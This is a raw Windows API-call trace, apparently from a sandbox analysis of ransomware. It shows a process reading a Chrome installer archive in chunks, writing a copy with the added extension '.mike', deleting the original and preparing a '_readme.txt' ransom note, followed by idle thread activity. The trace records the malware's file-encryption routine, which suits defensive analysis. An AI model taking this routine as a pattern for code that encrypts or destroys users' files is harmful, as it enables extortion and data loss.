GetFileType (hFile=0x1c8) returned 0x1 [0179.485] GetFileType (hFile=0x1c8) returned 0x1 [0179.485] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4706a20 [0179.485] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.486] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.486] GetFileType (hFile=0x1c8) returned 0x1 [0179.486] GetFileType (hFile=0x1c8) returned 0x1 [0179.486] ReadFile (in: hFile=0x1c8, lpBuffer=0x21e5b58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21e5b58*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.487] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.488] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.488] GetFileType (hFile=0x1c8) returned 0x1 [0179.488] GetFileType (hFile=0x1c8) returned 0x1 [0179.488] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4709220 [0179.489] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.489] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.489] GetFileType (hFile=0x1c8) returned 0x1 [0179.489] GetFileType (hFile=0x1c8) returned 0x1 [0179.489] ReadFile (in: hFile=0x1c8, lpBuffer=0x21f2b40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21f2b40*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.490] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.491] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.491] GetFileType (hFile=0x1c8) returned 0x1 [0179.491] GetFileType (hFile=0x1c8) returned 0x1 [0179.491] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x470ba20 [0179.492] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.492] GetFileType (hFile=0x1c8) returned 0x1 [0179.492] GetFileType (hFile=0x1c8) returned 0x1 [0179.493] ReadFile (in: hFile=0x1c8, lpBuffer=0x21ffb28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21ffb28*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.494] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.494] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.494] GetFileType (hFile=0x1c8) returned 0x1 [0179.494] GetFileType (hFile=0x1c8) returned 0x1 [0179.494] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x470e220 [0179.495] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.495] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.495] GetFileType (hFile=0x1c8) returned 0x1 [0179.495] GetFileType (hFile=0x1c8) returned 0x1 [0179.496] ReadFile (in: hFile=0x1c8, lpBuffer=0x220cb10, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x220cb10*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.497] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.497] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.497] GetFileType (hFile=0x1c8) returned 0x1 [0179.497] GetFileType (hFile=0x1c8) returned 0x1 [0179.497] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4710a20 [0179.498] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.498] GetFileType (hFile=0x1c8) returned 0x1 [0179.499] GetFileType (hFile=0x1c8) returned 0x1 [0179.499] ReadFile (in: hFile=0x1c8, lpBuffer=0x2219af8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2219af8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.500] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.500] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.500] GetFileType (hFile=0x1c8) returned 0x1 [0179.501] GetFileType (hFile=0x1c8) returned 0x1 [0179.501] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4713220 [0179.501] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.502] GetFileType (hFile=0x1c8) returned 0x1 [0179.502] GetFileType (hFile=0x1c8) returned 0x1 [0179.502] ReadFile (in: hFile=0x1c8, lpBuffer=0x2226ae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2226ae0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.503] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.503] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.504] GetFileType (hFile=0x1c8) returned 0x1 [0179.504] GetFileType (hFile=0x1c8) returned 0x1 [0179.504] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4715a20 [0179.504] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.505] GetFileType (hFile=0x1c8) returned 0x1 [0179.505] GetFileType (hFile=0x1c8) returned 0x1 [0179.505] ReadFile (in: hFile=0x1c8, lpBuffer=0x2233ac8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2233ac8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.506] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.506] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.507] GetFileType (hFile=0x1c8) returned 0x1 [0179.507] GetFileType (hFile=0x1c8) returned 0x1 [0179.507] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4718220 [0179.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.508] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.508] GetFileType (hFile=0x1c8) returned 0x1 [0179.508] GetFileType (hFile=0x1c8) returned 0x1 [0179.508] ReadFile (in: hFile=0x1c8, lpBuffer=0x2240ab0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2240ab0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.509] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.509] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.510] GetFileType (hFile=0x1c8) returned 0x1 [0179.510] GetFileType (hFile=0x1c8) returned 0x1 [0179.510] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x471aa20 [0179.510] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.511] GetFileType (hFile=0x1c8) returned 0x1 [0179.511] GetFileType (hFile=0x1c8) returned 0x1 [0179.511] ReadFile (in: hFile=0x1c8, lpBuffer=0x224da98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x224da98*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.512] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.513] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.513] GetFileType (hFile=0x1c8) returned 0x1 [0179.513] GetFileType (hFile=0x1c8) returned 0x1 [0179.513] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x471d220 [0179.513] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.514] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.514] GetFileType (hFile=0x1c8) returned 0x1 [0179.515] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0190.950] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0196.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aee40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0196.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0196.066] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", dwFileAttributes=0x80) returned 1 [0196.068] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z")) returned 1 [0196.094] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\_readme.txt", lpFilePart=0x0) returned 0x54 [0196.098] CoGetContextToken (in: pToken=0x2af240 | out: pToken=0x2af240) returned 0x0 [0196.098] CObjectContext::QueryInterface () returned 0x0 [0196.098] CObjectContext::GetCurrentThreadType () returned 0x0 [0196.098] Release () returned 0x0 [0196.099] CoGetContextToken (in: pToken=0x2aef5c | out: pToken=0x2aef5c) returned 0x0 [0196.099] CObjectContext::QueryInterface () returned 0x0 [0196.099] CObjectContext::GetCurrentThreadType () returned 0x0 [0196.099] Release () returned 0x0 [0196.101] CoGetContextToken (in: pToken=0x2aef5c | out: pToken=0x2aef5c) returned 0x0 [0196.101] CObjectContext::QueryInterface () returned 0x0 [0196.101] CObjectContext::GetCurrentThreadType () returned 0x0 [0196.101] Release () returned 0x0 [0196.131] CoGetContextToken (in: pToken=0x2aef5c | out: pToken=0x2aef5c) returned 0x0 [0196.131] CObjectContext::QueryInterface () returned 0x0 [0196.131] CObjectContext::GetCurrentThreadType () returned 0x0 [0196.131] Release () returned 0x0 [0196.132] CoGetContextToken (in: pToken=0x2aef74 | out: pToken=0x2aef74) returned 0x0 [0196.132] CObjectContext::QueryInterface () returned 0x0 [0196.132] CObjectContext::GetCurrentThreadType () returned 0x0 [0196.132] Release () returned 0x0 [0196.133] CoUninitialize () Thread: id = 2 os_tid = 0x8e4 Thread: id = 3 os_tid = 0x8e8 [0029.141] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0051.912] CloseHandle (hObject=0x288) returned 1 [0196.100] EtwEventUnregister () returned 0x0 [0196.102] CloseHandle (hObject=0x270) returned 1 [0196.114] CloseHandle (hObject=0x26c) returned 1 [0196.115] UnmapViewOfFile (lpBaseAddress=0x340000) returned 1 [0196.115] CloseHandle (hObject=0x274) returned 1 [0196.132] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 4 os_tid = 0x8ec Thread: id = 5 os_tid = 0x8f4 [0053.792] CoGetContextToken (in: pToken=0x495f52c | out: pToken=0x495f52c) returned 0x0 [0053.792] CObjectContext::QueryInterface () returned 0x0 [0053.792] CObjectContext::GetCurrentThreadType () returned 0x0 [0053.792] Release () returned 0x0 Thread: id = 6 os_tid = 0x8fc [0030.194] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0030.232] SleepEx (dwMilliseconds=0x1f4, bAlertable=1) returned 0x0 [0030.751] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0032.763] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0035.167] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0036.210] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0037.484] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0038.514] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0039.548] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0040.568] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0041.613] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0042.643] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0043.698] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0044.727] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0045.742] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0046.829] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0047.965] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0050.314] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0051.418] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0052.420] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0053.447] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0054.447] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0055.468] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0056.478] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0057.498] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0058.513] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0059.518] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0060.535] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0061.549] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0062.580] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0063.631] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0064.645] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0065.670] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 